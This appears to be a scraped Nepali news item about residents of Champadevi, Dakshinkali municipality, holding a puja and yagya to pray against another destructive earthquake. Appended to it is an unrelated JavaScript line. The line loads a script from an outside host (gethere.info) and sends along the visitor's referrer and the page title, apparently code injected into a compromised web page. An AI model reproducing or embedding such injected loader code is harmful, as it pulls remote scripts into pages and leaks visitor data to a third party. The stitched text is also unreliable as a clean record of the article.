देशमा फेरी बिनासकारी भूकम्प नआओस, देशमा शान्ति होस र भूकम्पका कारण ज्यान गुमाएकाको आत्माले शान्ति पाओस भन्ने कामना गर्दै काठमाडौमा निरन्तर पुजाआजा भईरहको छ। यसै क्रममा दक्षिणकाली नगरपालीका वडा नंवर ५ चम्पादेवीमा पनि पुजाआजा गरिएको छ। स्थानीय वृद्धवृद्धा, युवायुवती, महिला पुरुष सहित स्थानिय बासिन्दा भेला भएर पूजा सहित यज्ञ गरिएको हो। बिहान ८ बजेदेखि सुरु भएको यज्ञ दिउँसोसम्म चलेको थियो। यज्ञमा पाठ गरी चरु होम समेत गरिएको थियो। स्थानीय बासिन्दाको सहयोग र सहभागितामा भूमि पूजा, हवन एवं यज्ञको आयोजना गरिएको हो।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;